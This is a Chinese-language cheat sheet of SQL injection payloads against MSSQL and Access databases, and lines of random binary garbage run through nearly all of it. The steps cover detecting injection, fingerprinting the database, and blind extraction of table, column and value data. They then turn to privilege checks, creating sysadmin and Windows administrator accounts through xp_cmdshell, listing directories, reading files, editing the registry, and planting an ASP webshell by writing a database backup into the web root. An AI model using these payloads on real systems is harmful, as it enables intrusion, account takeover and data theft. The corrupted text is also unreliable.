1.判断是否有注入;and 1=1 ;and 1=2 ~,reS:�9RZ
2.初步判断是否是mssql ;and user>0 2�%t!�3F:
;%xG bg!lg
3.注入参数是字符'and [查询条件] and ''=' e}q!m(K]e-
f'B���#h;`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' K yp�(dp�>
�{;�?bC��'
5.判断数据库系统 \t�]aBT,��
1Y��y*G-7}
;and (select count(*) from sysobjects)>0 mssql 3�G-f+HN^E
}�t5pz[z�l
;and (select count(*) from msysobjects)>0 access }�#9 �|au`
�`p�Y�L/[5
cUZ^,)�8
Z
U%�_6'5s{^
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �?��=�\_�U
v$�bR&bC�T
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �/��lN09j�
�EO�\@#",a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��F�s1�ms)
v�K�NxL^�x
9.(1)猜字段的ascii值(access) ?i�Ni��h�E
w�0�$l3^}z
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 i��Vb��#X#
CiC@Z�,ud`
(2)猜字段的ascii值(mssql) ,�v��*<yz/
,Y��2){8#l
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 J|[`��8 *8
Ov�8{�ny��
10.测试权限结构(mssql) px.�]�m-
' $X}�'�u�
@��)m+�b�;
4p_@f^v~QH
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ���b�:(�*C
>rzpYc'~w�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Nyo�,6� AA
�&1,qC,:�!
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- qGc�>+�!�y
DSx D531[A
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �?����3Dsz
vCta�g]H2@
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- }�-�ysP$�
���j8��#B�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- >l|dLy�iae
K>fY�9`Whm
;and 1=(select IS_MEMBER('db_owner'));-- @ei:�/~�y3
g�Su3�\keF
IDr$Vu4LCW
E�[�E[Za^Y
11.添加mssql和系统的帐户 �|p{FS��S�
\�.��jT"Z~
;exec master.dbo.sp_addlogin username;-- B|n<{g[-cM
;exec master.dbo.sp_password null,username,password;-- /-�jk�_8@a
@�^�93q�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �Km��l�pB�
FR@##���i$
;exec master.dbo.xp_cmdshell 'net user username password xT�1{��O�`
p&ml$N9�fd
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kVb8��$Sp
�4�>x�v7��
;exec master.dbo.xp_cmdshell 'net user username password /add';-- #�3ac�t�)m
-QUvd1�S40
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Qr
l>�A�*�
_w>�9�Z>PR
�rC!~4x�j-
Q�!dN�JQpb
12.(1)遍历目录 S�[W|=�(f9
1ssEJ;�#�s
;create table dirs(paths varchar(100), id int) 0q
�^��dpM
+R?d�6IjH�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ;qT�7BUh(%
[{!5�{�k!
;and (select top 1 paths from dirs)>0 )5���1�H\o
�8y,
]>n��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) xk�zC+ �_A
SRx `m,535
3�xnu SOdh
mf)o1��O&B
(2)遍历目录 ��(�j�;6}@
sS�|N.�2�*
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- \aG:l.IM0�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �kGS�B�6��
H:HJHd�"W�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �`Dco��!ih
mME��a�*9P
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 h^KLqPB�t{
e.IK��mH]z
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =�K2mR}n\;
�#7A_p�8��
�hup<�U+�p
��zbDM��+;
13.mssql中的存储过程 I5J����9,j
���Gp�/yr�
xp_regenumvalues 注册表根键, 子键 �icPg<>�TQ
SlZ>�N$��E
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 T=QV =21qn
�r%/�*,lLO
xp_regread 根键,子键,键值名 H]7�;O�M/g
3yfq*\_uXw
;exec xp_regread ����)} H46
p}'uCT
ga
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 2�nRL;[L*.
E�5<}7�Pt�
xp_regwrite 根键,子键, 值名, 值类型, 值 0-W{(�xy@4
�I�JA�W�G�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 bLys�Uj5[5
S:En�9��E�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��BEzF�'<Z
93n�pz�pge
xp_regdeletevalue 根键,子键,值名 uI�I:��Y{G
�0#rv�.rJ{
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 3:�h9c�O/9
hd2 X�/�"
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �N}3�$1=@Y
9�s-op��:5
�zW_V)U�Ne
U8�z�$=W�o
14.mssql的backup创建webshell {<HL}m@k�Q
6�"Km �E}�
use model l�FNf/j^Z�
hel���iL/�
create table cmd(str image); �l ^*GqP5
/IS
j0"�/$
insert into cmd(str) values (''); ?N�,'1���I
Uk0��2VuS�
backup database model to disk='c:\l.asp'; jy] hP?QG�
�o[�bG(qHZ
D�� %`6�4R
D/w�4u�;E@
15.mssql内置函数 ?��5qo>W<7
RrkS!E[C��
;and (select @@version)>0 获得Windows的版本号 � l+.�E'��
/]�Fs�3uf
;and user_name()='dbo' 判断当前系统的连接用户是不是sa *@q+A1P7�@
�-BNlZgk-^
;and (select user_name())>0 爆当前系统的连接用户 QJ`#��&QRp
y#AwuC� K�
;and (select db_name())>0 得到当前连接的数据库 ��o?f7_8fG
aPq�9^S��*
ai(<�"|��(
fa��#]G^�f
16.简洁的webshell Vs���~^r>�
H��V`�{YuP
use model -}m#uUqI�
4'W|�'4�'b
create table cmd(str image); &�t���+���
\guZc}V]:\
insert into cmd(str) values (''); .[hQ#3�)W�
%�:n1S�]Vr
backup database model to disk='g:\wwwtest\l.asp';
